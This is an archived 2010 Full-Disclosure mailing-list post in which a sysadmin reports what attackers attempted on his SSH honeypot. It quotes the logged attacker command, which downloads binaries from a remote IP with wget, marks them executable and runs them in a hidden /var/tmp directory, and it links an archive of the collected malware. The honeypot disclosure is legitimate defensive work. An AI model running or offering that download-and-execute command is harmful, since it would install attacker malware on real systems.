| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <4CE51886.3030402@obit.nl>
Date: Thu, 18 Nov 2010 13:13:58 +0100
From: Marco van Berkum <marco@...t.nl>
To: full-disclosure@...ts.grok.org.uk
Subject: SSH scans, i caught one
Hi,
I got tired of all ssh scans the past few months so I've set up a
Kojoney honeypot
to see what the hell they were trying. This is what they try:
2010/11/17 21:22 CET [SSHChannel session (0) on SSHService
ssh-connection on SSHServerTransport,27,84.51.138.193] executing command
"cd /var/tmp;mkdir .scan;wgethttp://93.184.100.76:2700/pwn/syslgd;wget
<https://webmail.lan-services.nl/exchweb/bin/redir.asp?URL=http://93.184.100.76:2700/pwn/syslgd;wget>
http://93.184.100.76:2700/pwn/ssh;chmod
<https://webmail.lan-services.nl/exchweb/bin/redir.asp?URL=http://93.184.100.76:2700/pwn/ssh;chmod>
u+x syslgd ssh;./syslgd;rm syslgd"
So I downloaded all his files from the /pwn/ directory. The funny part
is, most of them are MIPS files(?).
Also there are a lot of IRC config-like files.
For anyone who's interested, this is what they try/download the moment
they can login.
http://safu.stream-portal.org/pwnd.tgz
Have a nice day,
Marco van Berkum
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists